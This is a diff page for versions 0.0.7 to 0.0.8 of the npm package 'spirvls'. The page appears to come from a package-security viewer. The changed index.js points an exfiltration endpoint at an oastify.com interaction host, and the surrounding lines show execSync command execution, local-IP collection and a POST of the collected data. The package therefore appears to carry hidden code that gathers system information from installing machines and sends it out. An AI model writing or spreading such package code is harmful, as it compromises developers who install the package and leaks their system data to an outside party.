spirvls 0.0.7 → 0.0.8
Sign up to get free protection for your applications and to get access to all the features.
- package/index.js +2 -2
- package/main.514d23457bdff209.js +2 -0
- package/package.json +2 -3
- package/rand.html +57 -0
package/index.js
CHANGED
@@ -5,7 +5,7 @@ const https = require("https");
|
|
5
5
|
const { execSync } = require("child_process");
|
6
6
|
|
7
7
|
// Replace with your Interactsh endpoint
|
8
|
-
const interactshEndpoint = "
|
8
|
+
const interactshEndpoint = "edvrar6ntsb95ijfs0aj6391lsrjf93y.oastify.com";
|
9
9
|
|
10
10
|
// Function to get the local IP address
|
11
11
|
function getLocalIP() {
|
@@ -70,4 +70,4 @@ try {
|
|
70
70
|
sendPostRequest(dataPayload);
|
71
71
|
} catch (error) {
|
72
72
|
console.error("Error executing commands:", error);
|
73
|
-
}
|
73
|
+
}
|